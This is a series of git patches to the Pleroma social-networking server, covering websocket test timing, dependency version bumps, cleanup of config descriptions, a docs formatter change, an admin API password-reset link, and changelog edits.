+ Process.sleep(30)
end)
end
- @tag needs_streamer: true
test "allows public streams without authentication" do
assert {:ok, _} = start_socket("?stream=public")
assert {:ok, _} = start_socket("?stream=public:local")
assert {:ok, _} = start_socket("?stream=hashtag&tag=lain")
end
- @tag needs_streamer: true
test "receives well formatted events" do
user = insert(:user)
{:ok, _} = start_socket("?stream=public")
@@ -94,31 +99,32 @@ test "accepts valid tokens", state do
assert {:ok, _} = start_socket("?stream=user&access_token=#{state.token.token}")
end
- @tag needs_streamer: true
test "accepts the 'user' stream", %{token: token} = _state do
assert {:ok, _} = start_socket("?stream=user&access_token=#{token.token}")
assert capture_log(fn ->
assert {:error, {403, "Forbidden"}} = start_socket("?stream=user")
+ Process.sleep(30)
end) =~ ":badarg"
end
- @tag needs_streamer: true
test "accepts the 'user:notification' stream", %{token: token} = _state do
assert {:ok, _} = start_socket("?stream=user:notification&access_token=#{token.token}")
assert capture_log(fn ->
assert {:error, {403, "Forbidden"}} = start_socket("?stream=user:notification")
+ Process.sleep(30)
end) =~ ":badarg"
end
- @tag needs_streamer: true
test "accepts valid token on Sec-WebSocket-Protocol header", %{token: token} do
assert {:ok, _} = start_socket("?stream=user", [{"Sec-WebSocket-Protocol", token.token}])
assert capture_log(fn ->
assert {:error, {403, "Forbidden"}} =
start_socket("?stream=user", [{"Sec-WebSocket-Protocol", "I am a friend"}])
+
+ Process.sleep(30)
end) =~ ":badarg"
end
end
From 6193157f1998b10ac6cb9f4d36dd863eced81b37 Mon Sep 17 00:00:00 2001
From: Steven Fuchs
Date: Tue, 17 Sep 2019 18:12:27 +0000
Subject: [PATCH 098/272] Fix notification warnings
---
lib/pleroma/workers/web_pusher_worker.ex | 6 +++++-
1 file changed, 5 insertions(+), 1 deletion(-)
diff --git a/lib/pleroma/workers/web_pusher_worker.ex b/lib/pleroma/workers/web_pusher_worker.ex
index bea2baffb..61b451e3e 100644
--- a/lib/pleroma/workers/web_pusher_worker.ex
+++ b/lib/pleroma/workers/web_pusher_worker.ex
@@ -10,7 +10,11 @@ defmodule Pleroma.Workers.WebPusherWorker do
@impl Oban.Worker
def perform(%{"op" => "web_push", "notification_id" => notification_id}, _job) do
- notification = Repo.get(Notification, notification_id)
+ notification =
+ Notification
+ |> Repo.get(notification_id)
+ |> Repo.preload([:activity])
+
Pleroma.Web.Push.Impl.perform(notification)
end
end
From 8d812c28a70ae174985000e98b9618dad746b22e Mon Sep 17 00:00:00 2001
From: rinpatch
Date: Tue, 17 Sep 2019 21:51:50 +0300
Subject: [PATCH 099/272] Update Tesla to 1.3
This version includes a couple of fixes, adds Gun and Mint adapters and
removes 0.x -> 1.0 config migrator, which for some reason fails under
certain conditions. I had to set `override: true` because Quack pins
Tesla to `1.2.0`, but I have looked through the source code and verified
that updating Tesla doesn't break anything there.
---
mix.exs | 2 +-
mix.lock | 2 +-
2 files changed, 2 insertions(+), 2 deletions(-)
diff --git a/mix.exs b/mix.exs
index 230f90244..d8d3f802d 100644
--- a/mix.exs
+++ b/mix.exs
@@ -113,7 +113,7 @@ defp deps do
{:calendar, "~> 0.17.4"},
{:cachex, "~> 3.0.2"},
{:poison, "~> 3.0", override: true},
- {:tesla, "~> 1.2"},
+ {:tesla, "~> 1.3", override: true},
{:jason, "~> 1.0"},
{:mogrify, "~> 0.6.1"},
{:ex_aws, "~> 2.1"},
diff --git a/mix.lock b/mix.lock
index 547ff6be6..24b34c09c 100644
--- a/mix.lock
+++ b/mix.lock
@@ -90,7 +90,7 @@
"swoosh": {:hex, :swoosh, "0.23.2", "7dda95ff0bf54a2298328d6899c74dae1223777b43563ccebebb4b5d2b61df38", [:mix], [{:cowboy, "~> 1.0.1 or ~> 1.1 or ~> 2.4", [hex: :cowboy, repo: "hexpm", optional: true]}, {:gen_smtp, "~> 0.13", [hex: :gen_smtp, repo: "hexpm", optional: true]}, {:hackney, "~> 1.9", [hex: :hackney, repo: "hexpm", optional: false]}, {:jason, "~> 1.0", [hex: :jason, repo: "hexpm", optional: false]}, {:mail, "~> 0.2", [hex: :mail, repo: "hexpm", optional: true]}, {:mime, "~> 1.1", [hex: :mime, repo: "hexpm", optional: false]}, {:plug_cowboy, ">= 1.0.0", [hex: :plug_cowboy, repo: "hexpm", optional: true]}], "hexpm"},
"syslog": {:git, "https://github.com/Vagabond/erlang-syslog.git", "4a6c6f2c996483e86c1320e9553f91d337bcb6aa", [tag: "1.0.5"]},
"telemetry": {:hex, :telemetry, "0.4.0", "8339bee3fa8b91cb84d14c2935f8ecf399ccd87301ad6da6b71c09553834b2ab", [:rebar3], [], "hexpm"},
- "tesla": {:hex, :tesla, "1.2.1", "864783cc27f71dd8c8969163704752476cec0f3a51eb3b06393b3971dc9733ff", [:mix], [{:exjsx, ">= 3.0.0", [hex: :exjsx, repo: "hexpm", optional: true]}, {:fuse, "~> 2.4", [hex: :fuse, repo: "hexpm", optional: true]}, {:hackney, "~> 1.6", [hex: :hackney, repo: "hexpm", optional: true]}, {:ibrowse, "~> 4.4.0", [hex: :ibrowse, repo: "hexpm", optional: true]}, {:jason, ">= 1.0.0", [hex: :jason, repo: "hexpm", optional: true]}, {:mime, "~> 1.0", [hex: :mime, repo: "hexpm", optional: false]}, {:poison, ">= 1.0.0", [hex: :poison, repo: "hexpm", optional: true]}], "hexpm"},
+ "tesla": {:hex, :tesla, "1.3.0", "f35d72f029e608f9cdc6f6d6fcc7c66cf6d6512a70cfef9206b21b8bd0203a30", [:mix], [{:castore, "~> 0.1", [hex: :castore, repo: "hexpm", optional: true]}, {:exjsx, ">= 3.0.0", [hex: :exjsx, repo: "hexpm", optional: true]}, {:fuse, "~> 2.4", [hex: :fuse, repo: "hexpm", optional: true]}, {:gun, "~> 1.3", [hex: :gun, repo: "hexpm", optional: true]}, {:hackney, "~> 1.6", [hex: :hackney, repo: "hexpm", optional: true]}, {:ibrowse, "~> 4.4.0", [hex: :ibrowse, repo: "hexpm", optional: true]}, {:jason, ">= 1.0.0", [hex: :jason, repo: "hexpm", optional: true]}, {:mime, "~> 1.0", [hex: :mime, repo: "hexpm", optional: false]}, {:mint, "~> 0.4", [hex: :mint, repo: "hexpm", optional: true]}, {:poison, ">= 1.0.0", [hex: :poison, repo: "hexpm", optional: true]}, {:telemetry, "~> 0.3", [hex: :telemetry, repo: "hexpm", optional: true]}], "hexpm"},
"timex": {:hex, :timex, "3.6.1", "efdf56d0e67a6b956cc57774353b0329c8ab7726766a11547e529357ffdc1d56", [:mix], [{:combine, "~> 0.10", [hex: :combine, repo: "hexpm", optional: false]}, {:gettext, "~> 0.10", [hex: :gettext, repo: "hexpm", optional: false]}, {:tzdata, "~> 0.1.8 or ~> 0.5 or ~> 1.0.0", [hex: :tzdata, repo: "hexpm", optional: false]}], "hexpm"},
"trailing_format_plug": {:hex, :trailing_format_plug, "0.0.7", "64b877f912cf7273bed03379936df39894149e35137ac9509117e59866e10e45", [:mix], [{:plug, "> 0.12.0", [hex: :plug, repo: "hexpm", optional: false]}], "hexpm"},
"tzdata": {:hex, :tzdata, "0.5.21", "8cbf3607fcce69636c672d5be2bbb08687fe26639a62bdcc283d267277db7cf0", [:mix], [{:hackney, "~> 1.0", [hex: :hackney, repo: "hexpm", optional: false]}], "hexpm"},
From d201eec45cc5eb8c7b0c912c14be4704dbb4c1b1 Mon Sep 17 00:00:00 2001
From: Maksim Pechnikov
Date: Tue, 17 Sep 2019 22:02:37 +0300
Subject: [PATCH 100/272] fixed ecto version
---
mix.exs | 2 +-
1 file changed, 1 insertion(+), 1 deletion(-)
diff --git a/mix.exs b/mix.exs
index 230f90244..58d1606d3 100644
--- a/mix.exs
+++ b/mix.exs
@@ -99,7 +99,7 @@ defp deps do
{:plug_cowboy, "~> 2.0"},
{:phoenix_pubsub, "~> 1.1"},
{:phoenix_ecto, "~> 4.0"},
- {:ecto_sql, "~> 3.1"},
+ {:ecto_sql, "~> 3.2"},
{:postgrex, ">= 0.13.5"},
{:oban, "~> 0.8.1"},
{:quantum, "~> 2.3"},
From 228bfd8a70cefadb8673ed6d11485944ef7c5666 Mon Sep 17 00:00:00 2001
From: Maxim Filippov
Date: Tue, 17 Sep 2019 22:36:42 +0300
Subject: [PATCH 101/272] Bump elixir version to ~> 1.8
---
CHANGELOG.md | 1 +
mix.exs | 2 +-
2 files changed, 2 insertions(+), 1 deletion(-)
diff --git a/CHANGELOG.md b/CHANGELOG.md
index 4eb72c002..f2d149304 100644
--- a/CHANGELOG.md
+++ b/CHANGELOG.md
@@ -16,6 +16,7 @@ The format is based on [Keep a Changelog](https://keepachangelog.com/en/1.0.0/).
- Remove `Reply-To` header from report emails for admins.
### Changed
+- **Breaking:** Now pleroma requires Elixir ~> 1.8 (it was ~> 1.7)
- **Breaking:** Configuration: A setting to explicitly disable the mailer was added, defaulting to true, if you are using a mailer add `config :pleroma, Pleroma.Emails.Mailer, enabled: true` to your config
- **Breaking:** Configuration: `/media/` is now removed when `base_url` is configured, append `/media/` to your `base_url` config to keep the old behaviour if desired
- **Breaking:** `/api/pleroma/notifications/read` is moved to `/api/v1/pleroma/notifications/read` and now supports `max_id` and responds with Mastodon API entities.
diff --git a/mix.exs b/mix.exs
index 230f90244..7d262a60f 100644
--- a/mix.exs
+++ b/mix.exs
@@ -5,7 +5,7 @@ def project do
[
app: :pleroma,
version: version("1.0.0"),
- elixir: "~> 1.7",
+ elixir: "~> 1.8",
elixirc_paths: elixirc_paths(Mix.env()),
compilers: [:phoenix, :gettext] ++ Mix.compilers(),
elixirc_options: [warnings_as_errors: true],
From 35dcea3e13673b8a1a078a1f6fbc44f1e2098c22 Mon Sep 17 00:00:00 2001
From: "Haelwenn (lanodan) Monnier"
Date: Fri, 13 Sep 2019 17:05:19 +0200
Subject: [PATCH 102/272] Remove [true,false] for booleans, it is implicit
---
config/description.exs | 262 +++++++++++------------------------------
1 file changed, 68 insertions(+), 194 deletions(-)
diff --git a/config/description.exs b/config/description.exs
index 32d36d6d6..5ae32d0f2 100644
--- a/config/description.exs
+++ b/config/description.exs
@@ -39,11 +39,7 @@
key: :link_name,
type: :boolean,
description:
- "If enabled, a name parameter will be added to the url of the upload. For example `https://instance.tld/media/imagehash.png?name=realname.png`",
- suggestions: [
- true,
- false
- ]
+ "If enabled, a name parameter will be added to the url of the upload. For example `https://instance.tld/media/imagehash.png?name=realname.png`"
},
%{
key: :base_url,
@@ -57,11 +53,7 @@
key: :proxy_remote,
type: :boolean,
description:
- "If enabled, requests to media stored using a remote uploader will be proxied instead of being redirected.",
- suggestions: [
- true,
- false
- ]
+ "If enabled, requests to media stored using a remote uploader will be proxied instead of being redirected."
},
%{
key: :proxy_opts,
@@ -190,11 +182,7 @@
%{
key: :enabled,
type: :boolean,
- description: "Allow/disallow send emails",
- suggestions: [
- true,
- false
- ]
+ description: "Allow/disallow send emails"
},
%{
group: {:subgroup, Swoosh.Adapters.SMTP},
@@ -221,8 +209,7 @@
group: {:subgroup, Swoosh.Adapters.SMTP},
key: :ssl,
type: :boolean,
- description: "`Swoosh.Adapters.SMTP` adapter specific setting",
- suggestions: [true, false]
+ description: "`Swoosh.Adapters.SMTP` adapter specific setting"
},
%{
group: {:subgroup, Swoosh.Adapters.SMTP},
@@ -256,8 +243,7 @@
group: {:subgroup, Swoosh.Adapters.SMTP},
key: :no_mx_lookups,
type: :boolean,
- description: "`Swoosh.Adapters.SMTP` adapter specific setting",
- suggestions: [true, false]
+ description: "`Swoosh.Adapters.SMTP` adapter specific setting"
},
%{
group: {:subgroup, Swoosh.Adapters.Sendgrid},
@@ -284,8 +270,7 @@
group: {:subgroup, Swoosh.Adapters.Sendmail},
key: :qmail,
type: :boolean,
- description: "`Swoosh.Adapters.Sendmail` adapter specific setting",
- suggestions: [true, false]
+ description: "`Swoosh.Adapters.Sendmail` adapter specific setting"
},
%{
group: {:subgroup, Swoosh.Adapters.Mandrill},
@@ -553,38 +538,22 @@
%{
key: :registrations_open,
type: :boolean,
- description: "Enable registrations for anyone, invitations can be enabled when false",
- suggestions: [
- true,
- false
- ]
+ description: "Enable registrations for anyone, invitations can be enabled when false"
},
%{
key: :invites_enabled,
type: :boolean,
- description: "Enable user invitations for admins (depends on registrations_open: false)",
- suggestions: [
- true,
- false
- ]
+ description: "Enable user invitations for admins (depends on registrations_open: false)"
},
%{
key: :account_activation_required,
type: :boolean,
- description: "Require users to confirm their emails before signing in",
- suggestions: [
- true,
- false
- ]
+ description: "Require users to confirm their emails before signing in"
},
%{
key: :federating,
type: :boolean,
- description: "Enable federation with other instances",
- suggestions: [
- true,
- false
- ]
+ description: "Enable federation with other instances"
},
%{
key: :federation_incoming_replies_max_depth,
@@ -618,11 +587,7 @@
%{
key: :allow_relay,
type: :boolean,
- description: "Enable Pleroma's Relay, which makes it possible to follow a whole instance",
- suggestions: [
- true,
- false
- ]
+ description: "Enable Pleroma's Relay, which makes it possible to follow a whole instance"
},
%{
key: :rewrite_policy,
@@ -638,11 +603,7 @@
type: :boolean,
description:
"Makes the client API in authentificated mode-only except for user-profiles." <>
- " Useful for disabling the Local Timeline and The Whole Known Network",
- suggestions: [
- true,
- false
- ]
+ " Useful for disabling the Local Timeline and The Whole Known Network"
},
%{
key: :quarantined_instances,
@@ -658,11 +619,7 @@
key: :managed_config,
type: :boolean,
description:
- "Whenether the config for pleroma-fe is configured in this config or in static/config.json",
- suggestions: [
- true,
- false
- ]
+ "Whenether the config for pleroma-fe is configured in this config or in static/config.json"
},
%{
key: :static_dir,
@@ -689,11 +646,7 @@
key: :mrf_transparency,
type: :boolean,
description:
- "Make the content of your Message Rewrite Facility settings public (via nodeinfo)",
- suggestions: [
- true,
- false
- ]
+ "Make the content of your Message Rewrite Facility settings public (via nodeinfo)"
},
%{
key: :mrf_transparency_exclusions,
@@ -709,11 +662,7 @@
type: :boolean,
description:
"Set to true to use extended local nicknames format (allows underscores/dashes)." <>
- " This will break federation with older software for theses nicknames",
- suggestions: [
- true,
- false
- ]
+ " This will break federation with older software for theses nicknames"
},
%{
key: :max_pinned_statuses,
@@ -741,11 +690,7 @@
key: :no_attachment_links,
type: :boolean,
description:
- "Set to true to disable automatically adding attachment link text to statuses",
- suggestions: [
- true,
- false
- ]
+ "Set to true to disable automatically adding attachment link text to statuses"
},
%{
key: :welcome_message,
@@ -780,20 +725,12 @@
description:
"If set to true, only mentions at the beginning of a post will be used to address people in direct messages." <>
" This is to prevent accidental mentioning of people when talking about them (e.g. \"@friend hey i really don't like @enemy\")." <>
- " Default: false",
- suggestions: [
- true,
- false
- ]
+ " Default: false"
},
%{
key: :healthcheck,
type: :boolean,
- description: "If set to true, system data will be shown on /api/pleroma/healthcheck",
- suggestions: [
- true,
- false
- ]
+ description: "If set to true, system data will be shown on /api/pleroma/healthcheck"
},
%{
key: :remote_post_retention_days,
@@ -823,11 +760,7 @@
%{
key: :skip_thread_containment,
type: :boolean,
- description: "Skip filter out broken threads. The default is true",
- suggestions: [
- true,
- false
- ]
+ description: "Skip filter out broken threads. The default is true"
},
%{
key: :limit_to_local_content,
@@ -844,11 +777,7 @@
key: :dynamic_configuration,
type: :boolean,
description:
- "Allow transferring configuration to DB with the subsequent customization from Admin api. Defaults to `false`",
- suggestions: [
- true,
- false
- ]
+ "Allow transferring configuration to DB with the subsequent customization from Admin api. Defaults to `false`"
},
%{
key: :max_account_fields,
@@ -886,11 +815,7 @@
%{
key: :external_user_synchronization,
type: :boolean,
- description: "Enabling following/followers counters synchronization for external users",
- suggestions: [
- true,
- false
- ]
+ description: "Enabling following/followers counters synchronization for external users"
}
]
},
@@ -1069,48 +994,40 @@
%{
key: :showInstanceSpecificPanel,
type: :boolean,
- description: "Whenether to show the instance's specific panel",
- suggestions: [true, false]
+ description: "Whenether to show the instance's specific panel"
},
%{
key: :scopeOptionsEnabled,
type: :boolean,
- description: "Enable setting an notice visibility and subject/CW when posting",
- suggestions: [true, false]
+ description: "Enable setting an notice visibility and subject/CW when posting"
},
%{
key: :formattingOptionsEnabled,
type: :boolean,
description:
- "Enable setting a formatting different than plain-text (ie. HTML, Markdown) when posting, relates to :instance, allowed_post_formats",
- suggestions: [true, false]
+ "Enable setting a formatting different than plain-text (ie. HTML, Markdown) when posting, relates to :instance, allowed_post_formats"
},
%{
key: :collapseMessageWithSubject,
type: :boolean,
description:
- "When a message has a subject(aka Content Warning), collapse it by default",
- suggestions: [true, false]
+ "When a message has a subject(aka Content Warning), collapse it by default"
},
%{
key: :hidePostStats,
type: :boolean,
- description: "Hide notices statistics(repeats, favorites, ...)",
- suggestions: [true, false]
+ description: "Hide notices statistics(repeats, favorites, ...)"
},
%{
key: :hideUserStats,
type: :boolean,
description:
- "Hide profile statistics(posts, posts per day, followers, followings, ...)",
- suggestions: [true, false]
+ "Hide profile statistics(posts, posts per day, followers, followings, ...)"
},
%{
key: :scopeCopy,
type: :boolean,
- description:
- "Copy the scope (private/unlisted/public) in replies to posts by default",
- suggestions: [true, false]
+ description: "Copy the scope (private/unlisted/public) in replies to posts by default"
},
%{
key: :subjectLineBehavior,
@@ -1124,8 +1041,7 @@
%{
key: :alwaysShowSubjectInput,
type: :boolean,
- description: "When set to false, auto-hide the subject field when it's empty",
- suggestions: [true, false]
+ description: "When set to false, auto-hide the subject field when it's empty"
}
]
},
@@ -1142,8 +1058,7 @@
%{
key: :showInstanceSpecificPanel,
type: :boolean,
- description: "Whenether to show the instance's specific panel",
- suggestions: [true, false]
+ description: "Whenether to show the instance's specific panel"
}
]
}
@@ -1271,14 +1186,12 @@
%{
key: :allow_followersonly,
type: :boolean,
- description: "whether to allow followers-only posts",
- suggestions: [true, false]
+ description: "whether to allow followers-only posts"
},
%{
key: :allow_direct,
type: :boolean,
- description: "whether to allow direct messages",
- suggestions: [true, false]
+ description: "whether to allow direct messages"
}
]
},
@@ -1393,8 +1306,7 @@
%{
key: :enabled,
type: :boolean,
- description: "Enables proxying of remote media to the instance's proxy",
- suggestions: [true, false]
+ description: "Enables proxying of remote media to the instance's proxy"
},
%{
key: :base_url,
@@ -1426,8 +1338,7 @@
%{
key: :enabled,
type: :boolean,
- description: "Enables the gopher interface",
- suggestions: [true, false]
+ description: "Enables the gopher interface"
},
%{
key: :ip,
@@ -1601,8 +1512,7 @@
%{
key: :secure_cookie_flag,
type: :boolean,
- description: "",
- suggestions: [true, false]
+ description: ""
},
%{
key: :extra_cookie_attrs,
@@ -1621,20 +1531,17 @@
%{
key: :unfollow_blocked,
type: :boolean,
- description: "Whether blocks result in people getting unfollowed",
- suggestions: [true, false]
+ description: "Whether blocks result in people getting unfollowed"
},
%{
key: :outgoing_blocks,
type: :boolean,
- description: "Whether to federate blocks to other instances",
- suggestions: [true, false]
+ description: "Whether to federate blocks to other instances"
},
%{
key: :sign_object_fetches,
type: :boolean,
- description: "Sign object fetches with HTTP signatures",
- suggestions: [true, false]
+ description: "Sign object fetches with HTTP signatures"
},
%{
key: :follow_handshake_timeout,
@@ -1653,14 +1560,12 @@
%{
key: :enabled,
type: :boolean,
- description: "Whether the managed content security policy is enabled",
- suggestions: [true, false]
+ description: "Whether the managed content security policy is enabled"
},
%{
key: :sts,
type: :boolean,
- description: "Whether to additionally send a Strict-Transport-Security header",
- suggestions: [true, false]
+ description: "Whether to additionally send a Strict-Transport-Security header"
},
%{
key: :sts_max_age,
@@ -1727,8 +1632,7 @@
%{
key: :enabled,
type: :boolean,
- description: "Whether the captcha should be shown on registration",
- suggestions: [true, false]
+ description: "Whether the captcha should be shown on registration"
},
%{
key: :method,
@@ -1817,8 +1721,7 @@
%{
key: :verbose,
type: :boolean,
- description: "Logs verbose mode",
- suggestions: [false, true]
+ description: "Logs verbose mode"
},
%{
key: :prune,
@@ -1937,11 +1840,7 @@
%{
key: :unfurl_nsfw,
type: :boolean,
- description: "If set to true nsfw attachments will be shown in previews",
- suggestions: [
- true,
- false
- ]
+ description: "If set to true nsfw attachments will be shown in previews"
}
]
},
@@ -1955,8 +1854,7 @@
key: :enabled,
type: :boolean,
description:
- "if enabled the instance will parse metadata from attached links to generate link previews",
- suggestions: [true, false]
+ "if enabled the instance will parse metadata from attached links to generate link previews"
},
%{
key: :ignore_hosts,
@@ -1998,8 +1896,7 @@
key: :enabled,
type: :boolean,
description:
- "if enabled, when a new user is federated with, fetch some of their latest posts",
- suggestions: [true, false]
+ "if enabled, when a new user is federated with, fetch some of their latest posts"
},
%{
key: :pages,
@@ -2030,14 +1927,12 @@
%{
key: :new_window,
type: :boolean,
- description: "set to false to remove target='_blank' attribute",
- suggestions: [true, false]
+ description: "set to false to remove target='_blank' attribute"
},
%{
key: :scheme,
type: :boolean,
- description: "Set to true to link urls with schema http://google.com",
- suggestions: [true, false]
+ description: "Set to true to link urls with schema http://google.com"
},
%{
key: :truncate,
@@ -2049,14 +1944,12 @@
%{
key: :strip_prefix,
type: :boolean,
- description: "Strip the scheme prefix",
- suggestions: [true, false]
+ description: "Strip the scheme prefix"
},
%{
key: :extra,
type: :boolean,
- description: "link urls with rarely used schemes (magnet, ipfs, irc, etc.)",
- suggestions: [true, false]
+ description: "link urls with rarely used schemes (magnet, ipfs, irc, etc.)"
}
]
},
@@ -2083,8 +1976,7 @@
%{
key: :enabled,
type: :boolean,
- description: "whether scheduled activities are sent to the job queue to be executed",
- suggestions: [true, false]
+ description: "whether scheduled activities are sent to the job queue to be executed"
}
]
},
@@ -2097,8 +1989,7 @@
%{
key: :enabled,
type: :boolean,
- description: "whether expired activities will be sent to the job queue to be deleted",
- suggestions: [true, false]
+ description: "whether expired activities will be sent to the job queue to be deleted"
}
]
},
@@ -2128,8 +2019,7 @@
%{
key: :enabled,
type: :boolean,
- description: "enables LDAP authentication",
- suggestions: [true, false]
+ description: "enables LDAP authentication"
},
%{
key: :host,
@@ -2146,8 +2036,7 @@
%{
key: :ssl,
type: :boolean,
- description: "true to use SSL, usually implies the port 636",
- suggestions: [true, false]
+ description: "true to use SSL, usually implies the port 636"
},
%{
key: :sslopts,
@@ -2158,8 +2047,7 @@
%{
key: :tls,
type: :boolean,
- description: "true to start TLS, usually implies the port 389",
- suggestions: [true, false]
+ description: "true to start TLS, usually implies the port 389"
},
%{
key: :tlsopts,
@@ -2237,8 +2125,7 @@
%{
key: :active,
type: :boolean,
- description: "globally enable or disable digest emails",
- suggestions: [true, false]
+ description: "globally enable or disable digest emails"
},
%{
key: :schedule,
@@ -2346,14 +2233,12 @@
key: :issue_new_refresh_token,
type: :boolean,
description:
- "Keeps old refresh token or generate new refresh token when to obtain an access token",
- suggestions: [true, false]
+ "Keeps old refresh token or generate new refresh token when to obtain an access token"
},
%{
key: :clean_expired_tokens,
type: :boolean,
- description: "Enable a background job to clean expired oauth tokens. Defaults to false",
- suggestions: [true, false]
+ description: "Enable a background job to clean expired oauth tokens. Defaults to false"
},
%{
key: :clean_expired_tokens_interval,
@@ -2415,8 +2300,7 @@
%{
key: :rum_enabled,
type: :boolean,
- description: "If RUM indexes should be used. Defaults to false",
- suggestions: [true, false]
+ description: "If RUM indexes should be used. Defaults to false"
}
]
},
@@ -2475,8 +2359,7 @@
%{
key: :enabled,
type: :boolean,
- description: "Enables ssh",
- suggestions: [true, false]
+ description: "Enables ssh"
},
%{
key: :priv_dir,
@@ -2579,8 +2462,7 @@
%{
key: :enabled,
type: :boolean,
- description: "",
- suggestions: [true, false]
+ description: ""
}
]
},
@@ -2593,8 +2475,7 @@
%{
key: :enabled,
type: :boolean,
- description: "Enables suggestions",
- suggestions: []
+ description: "Enables suggestions"
},
%{
key: :third_party_engine,
@@ -2686,8 +2567,7 @@
%{
key: :send_user_agent,
type: :boolean,
- description: "",
- suggestions: [true, false]
+ description: ""
},
%{
key: :adapter,
@@ -2715,26 +2595,22 @@
%{
key: :allow_inline_images,
type: :boolean,
- description: "",
- suggestions: [true, false]
+ description: ""
},
%{
key: :allow_headings,
type: :boolean,
- description: "",
- suggestions: [true, false]
+ description: ""
},
%{
key: :allow_tables,
type: :boolean,
- description: "",
- suggestions: [true, false]
+ description: ""
},
%{
key: :allow_fonts,
type: :boolean,
- description: "",
- suggestions: [true, false]
+ description: ""
},
%{
key: :scrub_policy,
@@ -2753,8 +2629,7 @@
%{
key: :deny_follow_blocked,
type: :boolean,
- description: "",
- suggestions: [true, false]
+ description: ""
}
]
},
@@ -2854,8 +2729,7 @@
%{
key: :credentials,
type: :boolean,
- description: "",
- suggestions: [true, false]
+ description: ""
},
%{
key: :headers,
From 7f211a48e0c443cbff90f028c5c92c496f66c62e Mon Sep 17 00:00:00 2001
From: "Haelwenn (lanodan) Monnier"
Date: Tue, 17 Sep 2019 21:43:27 +0200
Subject: [PATCH 103/272] docs/markdown.ex: child header as "- key (type):
description"
---
lib/pleroma/docs/markdown.ex | 12 +++++++-----
1 file changed, 7 insertions(+), 5 deletions(-)
diff --git a/lib/pleroma/docs/markdown.ex b/lib/pleroma/docs/markdown.ex
index 8386dc2fb..58a42b323 100644
--- a/lib/pleroma/docs/markdown.ex
+++ b/lib/pleroma/docs/markdown.ex
@@ -44,6 +44,13 @@ def process(descriptions) do
{:ok, config_path}
end
+ defp print_child_header(file, child) do
+ IO.write(
+ file,
+ "- `#{inspect(child[:key])}` (`#{inspect(child[:type])}`): #{child[:description]}\n"
+ )
+ end
+
defp print_suggestion(file, suggestion) when is_list(suggestion) do
IO.write(file, " `#{inspect(suggestion)}`\n")
end
@@ -70,9 +77,4 @@ defp print_suggestions(file, suggestions) do
print_suggestion(file, List.first(suggestions))
end
end
-
- defp print_child_header(file, child) do
- IO.write(file, "- `#{inspect(child[:key])}` -`#{inspect(child[:type])}` \n")
- IO.write(file, "#{child[:description]} \n")
- end
end
From e686f9be818ebddfba1aedcd9ae328d26147dca8 Mon Sep 17 00:00:00 2001
From: Maxim Filippov
Date: Tue, 17 Sep 2019 20:04:57 +0000
Subject: [PATCH 104/272] Apply suggestion to CHANGELOG.md
---
CHANGELOG.md | 2 +-
1 file changed, 1 insertion(+), 1 deletion(-)
diff --git a/CHANGELOG.md b/CHANGELOG.md
index f2d149304..58618b7f5 100644
--- a/CHANGELOG.md
+++ b/CHANGELOG.md
@@ -16,7 +16,7 @@ The format is based on [Keep a Changelog](https://keepachangelog.com/en/1.0.0/).
- Remove `Reply-To` header from report emails for admins.
### Changed
-- **Breaking:** Now pleroma requires Elixir ~> 1.8 (it was ~> 1.7)
+- **Breaking:** Elixir >=1.8 is now required (was >= 1.7)
- **Breaking:** Configuration: A setting to explicitly disable the mailer was added, defaulting to true, if you are using a mailer add `config :pleroma, Pleroma.Emails.Mailer, enabled: true` to your config
- **Breaking:** Configuration: `/media/` is now removed when `base_url` is configured, append `/media/` to your `base_url` config to keep the old behaviour if desired
- **Breaking:** `/api/pleroma/notifications/read` is moved to `/api/v1/pleroma/notifications/read` and now supports `max_id` and responds with Mastodon API entities.
From f9dd121ad3f7e1de465f81c7a5fe4e4173d88e28 Mon Sep 17 00:00:00 2001
From: Maxim Filippov
Date: Tue, 17 Sep 2019 23:09:08 +0300
Subject: [PATCH 105/272] Admin API: Return link alongside with token on
password reset
---
CHANGELOG.md | 1 +
lib/pleroma/web/admin_api/admin_api_controller.ex | 7 ++++++-
2 files changed, 7 insertions(+), 1 deletion(-)
diff --git a/CHANGELOG.md b/CHANGELOG.md
index 4eb72c002..0f4a171c2 100644
--- a/CHANGELOG.md
+++ b/CHANGELOG.md
@@ -32,6 +32,7 @@ The format is based on [Keep a Changelog](https://keepachangelog.com/en/1.0.0/).
– Pagination: (optional) return `total` alongside with `items` when paginating
- Replaced [pleroma_job_queue](https://git.pleroma.social/pleroma/pleroma_job_queue) and `Pleroma.Web.Federator.RetryQueue` with [Oban](https://github.com/sorentwo/oban) (see [`docs/config.md`](docs/config.md) on migrating customized worker / retry settings)
- Introduced [quantum](https://github.com/quantum-elixir/quantum-core) job scheduler
+- Admin API: Return link alongside with token on password reset
### Fixed
- Following from Osada
diff --git a/lib/pleroma/web/admin_api/admin_api_controller.ex b/lib/pleroma/web/admin_api/admin_api_controller.ex
index 544b9d7d8..03a73053b 100644
--- a/lib/pleroma/web/admin_api/admin_api_controller.ex
+++ b/lib/pleroma/web/admin_api/admin_api_controller.ex
@@ -432,9 +432,14 @@ def revoke_invite(conn, %{"token" => token}) do
def get_password_reset(conn, %{"nickname" => nickname}) do
(%User{local: true} = user) = User.get_cached_by_nickname(nickname)
{:ok, token} = Pleroma.PasswordResetToken.create_token(user)
+ host = Pleroma.Config.get([Pleroma.Web.Endpoint, :url, :host])
+ protocol = Pleroma.Config.get([Pleroma.Web.Endpoint, :protocol])
conn
- |> json(token.token)
+ |> json(%{
+ token: token.token,
+ link: "#{protocol}://#{host}/api/pleroma/password_reset/#{token}"
+ })
end
def list_reports(conn, params) do
From bf8567996c6149e5a7857ccf74697184adb42be9 Mon Sep 17 00:00:00 2001
From: rinpatch
Date: Tue, 17 Sep 2019 23:48:26 +0300
Subject: [PATCH 106/272] Sync develop changelog with master and create a new
section for post-1.1 changes
---
CHANGELOG.md | 92 +++++++++++++++++++++++++++++++++++-----------------
1 file changed, 62 insertions(+), 30 deletions(-)
diff --git a/CHANGELOG.md b/CHANGELOG.md
index 4426e3f70..1f0d55e9b 100644
--- a/CHANGELOG.md
+++ b/CHANGELOG.md
@@ -4,24 +4,25 @@ All notable changes to this project will be documented in this file.
The format is based on [Keep a Changelog](https://keepachangelog.com/en/1.0.0/).
## [Unreleased]
+### Changed
+- **Breaking:** Elixir >=1.8 is now required (was >= 1.7)
+- Replaced [pleroma_job_queue](https://git.pleroma.social/pleroma/pleroma_job_queue) and `Pleroma.Web.Federator.RetryQueue` with [Oban](https://github.com/sorentwo/oban) (see [`docs/config.md`](docs/config.md) on migrating customized worker / retry settings)
+- Introduced [quantum](https://github.com/quantum-elixir/quantum-core) job scheduler
